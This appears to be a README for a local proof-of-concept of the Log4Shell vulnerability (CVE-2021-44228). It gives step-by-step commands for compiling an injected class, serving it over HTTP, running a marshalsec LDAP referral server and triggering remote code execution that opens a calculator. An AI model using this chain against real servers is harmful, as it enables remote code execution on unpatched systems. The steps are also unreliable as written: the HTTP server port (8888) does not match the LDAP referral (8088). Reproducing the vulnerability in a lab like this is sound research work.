Versions Affected: all versions from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0
Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)
- 下载该项目,编译InjectClazz.java
# download
git clone http://github.com/lonecloud/CVE-2021-44228-Apache-Log4j
cd CVE-2021-44228-Apache-Log4j
javac InjectClazz.java
- 在InjectClazz所在目录下启动web服务器
# start webserver
# For Python2
python -m SimpleHTTPServer 8888
# For Python3
python3 -m http.server 8888
#
- 下载LDAP 服务器
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8088/#InjectClazz" 1389
- 运行项目
cd CCVE-2021-44228-Apache-Log4j
mvn clean package
java -cp target/CVE-2021-44228-Apache-Log4j-1.0-SNAPSHOT-all.jar Log4jAceMain
# expect the following
# 1. calculator app appear
# 2. in ldapserver console,
Send LDAP reference result for Exploit redirecting to http://127.0.0.1:8088/InjectClazz.class
# 3. in webserver console,
# 127.0.0.1 - - [....] "GET /InjectClazz.class HTTP/1.1" 200 -